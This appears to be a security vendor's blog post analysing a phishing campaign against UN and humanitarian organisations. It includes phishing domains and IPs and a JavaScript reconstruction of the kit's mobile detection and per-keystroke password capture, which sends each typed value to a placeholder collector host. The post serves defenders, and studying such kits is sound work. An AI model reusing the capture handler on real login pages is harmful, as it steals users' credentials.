Phishing attack targeting United Nations and humanitarian organizations discovered by Lookout Phishing AI

TL;DR:

Lookout Phishing AI has detected a mobile-aware phishing campaign targeting non-governmental organizations around the world, including a number of United Nations humanitarian organizations such as UNICEF. Lookout has notified law enforcement and the targeted organizations, but as of the publication of this blog the attack is still ongoing.

Background on the phishing campaign

The infrastructure connected to this attack has been live since March 2019. Two domains have been hosting phishing content, session-services[.]com and service-ssl-check[.]com, which resolved to two IP addresses over the course of this campaign: 111.90.142.105 and 111.90.142.91. The associated IP network block and ASN (Autonomous System Number) are understood by Lookout to be of low reputation and are known to have hosted malware in the past.

Mobile-Aware functionality and key logging

Lookout has identified several noteworthy techniques employed in this campaign, including its ability to detect mobile devices and to log keystrokes directly as they are entered in the password field.

Specifically, JavaScript on the phishing pages detects whether the page is being loaded on a mobile device and, if so, serves mobile-specific content. Mobile web browsers also unintentionally help obfuscate phishing URLs by truncating them in the address bar, making it harder for victims to notice the deception.

Lookout has also collected evidence of keylogging functionality embedded in the password field of the phishing login pages: whatever is typed into the field is sent to the command and control infrastructure operated by the malicious actor as it is entered. A target who never presses the login button, or who enters a different, unintended password, therefore still has that input captured.
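To make the two client-side behaviours above concrete, here is an added reconstruction written for this post; it is not code recovered from the phishing kit. The mobile detection and the password capture are written as pure functions so they can be exercised in Node without a browser; in a real kit the `onInput` handler would be attached to the password element's `input` event and `send` would be something like `navigator.sendBeacon`. The user-agent pattern, the collector URL and the simulated typing are assumptions constructed for illustration.

```javascript
// Added example, not the kit's code: reconstruction of the mobile-aware
// template selection and the per-keystroke password capture described above.

// Mobile detection as a phishing page might do it: a user-agent test decides
// which login template to serve. The pattern is an assumption.
const MOBILE_UA = /Android|iPhone|iPad|iPod|Mobile|Windows Phone/i;

function isMobileUserAgent(ua) {
  return MOBILE_UA.test(ua || "");
}

function chooseTemplate(ua) {
  return isMobileUserAgent(ua) ? "login-mobile.html" : "login-desktop.html";
}

// Keystroke capture on the password field: every change to the field's value
// is sent immediately, so a partially typed or later-corrected password reaches
// the collector even if the victim never submits the form.
function createPasswordCapture(send, collectorUrl) {
  const captured = []; // every value the collector would have received, in order
  return {
    // Wire this as the 'input' handler on the password element.
    onInput(event) {
      const value = event.target.value;
      captured.push(value);
      send(collectorUrl, JSON.stringify({ t: Date.now(), field: "password", value }));
    },
    // Analyst's view of the collected stream: the last non-empty value of each
    // typing burst (bursts are separated by the field being cleared). This is
    // how a "different, unintended password" shows up alongside the real one.
    candidatePasswords() {
      const out = [];
      let last = null;
      for (const v of captured) {
        if (v === "") {
          if (last !== null) out.push(last);
          last = null;
        } else {
          last = v;
        }
      }
      if (last !== null) out.push(last);
      return out;
    },
  };
}

// Constructed scenario: the victim types "hunter2", clears the field, types
// "S3cret!" and never clicks Login. Nothing is sent anywhere; `send` just records.
function simulateVictim() {
  const sent = [];
  const capture = createPasswordCapture(
    (url, body) => sent.push({ url, body }),
    "https://collector.example/c" // assumed collector endpoint
  );
  const field = { value: "" };
  const type = (ch) => { field.value += ch; capture.onInput({ target: field }); };
  for (const ch of "hunter2") type(ch);
  field.value = ""; capture.onInput({ target: field }); // field cleared
  for (const ch of "S3cret!") type(ch);
  return {
    sentCount: sent.length,
    lastSent: JSON.parse(sent[sent.length - 1].body).value,
    candidates: capture.candidatePasswords(),
  };
}
```

The point for defenders is in `simulateVictim`: fifteen messages leave the page and both "hunter2" and "S3cret!" are recoverable by the attacker, although the form was never submitted. A user who reports "I started typing but didn't click Login" should be treated as having exposed every password they typed, and those credentials rotated.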

SSL certificates and humanitarian aid domains

All major browsers warn users when a site presents an expired SSL certificate. Because these warnings are prominent (and often hard to dismiss), it is very unlikely that a user could be enticed to enter login credentials on a site with an expired certificate. The expired SSL certificates observed on some of the phishing sites therefore bound the period during which each site was usable for the attack.

SSL certificates used by the phishing infrastructure had two main ranges of validity: May 5, 2019 to August 3, 2019, and June 5, 2019 to September 3, 2019. Six certificates are currently still valid, and Lookout suspects that these attacks may still be ongoing. The table at the end of this blog lists the targeted organizations, the URLs targeting them, and whether the SSL certificate on each site is still valid as of the writing of this report.
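The following added example (not Lookout's tooling) applies the reasoning above: given the notBefore/notAfter dates of the certificates a set of hosts presented, it classifies each certificate at a reference instant, counts how many are still valid, and derives the earliest and latest bounds the certificates place on the campaign. Dates are handled in the OpenSSL text format that both `openssl x509 -noout -dates` and Node's `getPeerCertificate()` return. The hostnames and the reference date are constructed; only the two validity ranges are taken from the post.

```javascript
// Added example, not the post's own analysis code: infer a campaign's active
// window from certificate validity dates.

const MONTHS = { Jan: 0, Feb: 1, Mar: 2, Apr: 3, May: 4, Jun: 5,
                 Jul: 6, Aug: 7, Sep: 8, Oct: 9, Nov: 10, Dec: 11 };

// Parse "Mon D HH:MM:SS YYYY GMT" (e.g. "May  5 00:00:00 2019 GMT") ourselves
// rather than relying on Date.parse's lenient, engine-specific behaviour.
function parseOpenSslDate(s) {
  const m = /^([A-Z][a-z]{2})\s+(\d{1,2})\s+(\d{2}):(\d{2}):(\d{2})\s+(\d{4})\s+GMT$/.exec(s.trim());
  if (!m || !(m[1] in MONTHS)) throw new Error(`unrecognised certificate date: ${s}`);
  return new Date(Date.UTC(+m[6], MONTHS[m[1]], +m[2], +m[3], +m[4], +m[5]));
}

// Status of one certificate at a reference instant.
function certStatus(cert, at) {
  const notBefore = parseOpenSslDate(cert.notBefore);
  const notAfter = parseOpenSslDate(cert.notAfter);
  if (at < notBefore) return "not_yet_valid";
  if (at > notAfter) return "expired";
  return "valid";
}

// Per-host status, count of still-valid certificates, and the outer bounds
// (earliest notBefore, latest notAfter) the certificates put on the campaign.
function summarise(certs, at) {
  const statuses = certs.map((c) => ({ host: c.host, status: certStatus(c, at) }));
  const starts = certs.map((c) => parseOpenSslDate(c.notBefore).getTime());
  const ends = certs.map((c) => parseOpenSslDate(c.notAfter).getTime());
  return {
    statuses,
    stillValid: statuses.filter((s) => s.status === "valid").length,
    earliestNotBefore: new Date(Math.min(...starts)).toISOString(),
    latestNotAfter: new Date(Math.max(...ends)).toISOString(),
  };
}

// Pull the dates off a live host over TLS only (the page is never fetched or
// rendered). Verification is disabled on purpose so that an already-expired
// certificate can still be inspected. Not called by the offline sample below.
function fetchCertDates(host, port = 443) {
  const tls = require("tls");
  return new Promise((resolve, reject) => {
    const sock = tls.connect(port, host, { servername: host, rejectUnauthorized: false }, () => {
      const c = sock.getPeerCertificate();
      sock.end();
      resolve({ host, notBefore: c.valid_from, notAfter: c.valid_to });
    });
    sock.on("error", reject);
  });
}

// Constructed sample mirroring the two validity ranges observed in the campaign.
// The hostnames are placeholders, not the real phishing URLs.
const SAMPLE_CERTS = [
  { host: "login.phish-sample-a.test", notBefore: "May  5 00:00:00 2019 GMT", notAfter: "Aug  3 23:59:59 2019 GMT" },
  { host: "login.phish-sample-b.test", notBefore: "Jun  5 00:00:00 2019 GMT", notAfter: "Sep  3 23:59:59 2019 GMT" },
];

// Evaluate the sample as of 2019-08-15 (assumed reference date): the first
// certificate has expired, the second is still valid.
function sampleSummary() {
  return summarise(SAMPLE_CERTS, new Date(Date.UTC(2019, 7, 15)));
}
```

With real data, replace `SAMPLE_CERTS` with the output of `fetchCertDates` for each host (or with the `notBefore=`/`notAfter=` lines from `openssl s_client -connect host:443 -servername host </dev/null | openssl x509 -noout -dates`). A certificate that has already expired tells you the site stopped being usable for phishing no later than its notAfter date; one that is still valid, as six were at the time of writing, is a reason to assume the site is still live.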

A sample of one of the live phishing sites discovered by Lookout researchers. Top: The legitimate login page targeted by this phishing attack. Bottom: The phishing site mimicking the legitimate Office365 login page for employees of the International Federation of Red Cross and Red Crescent Societies.

Lookout Phishing and Content Protection

The mobile-aware component found in this campaign is further evidence that phishing attacks have evolved to target mobile devices. Mobile phishing has emerged as a growing source of risk for enterprises: the post-perimeter world and widespread adoption of bring your own device (BYOD) policies blur the lines between personal devices and corporate networks, and mobile devices present an expanded, multi-channel threat surface.

Lookout Phishing & Content Protection goes beyond traditional phishing channels and detects phishing attacks from all types of sources, including personal and corporate email, social media, SMS and other messaging and apps. Lookout also detects access to malicious sites, including malware and spyware distribution, command and control servers, and botnets — from URLs delivered by any app or channel on a user’s device.
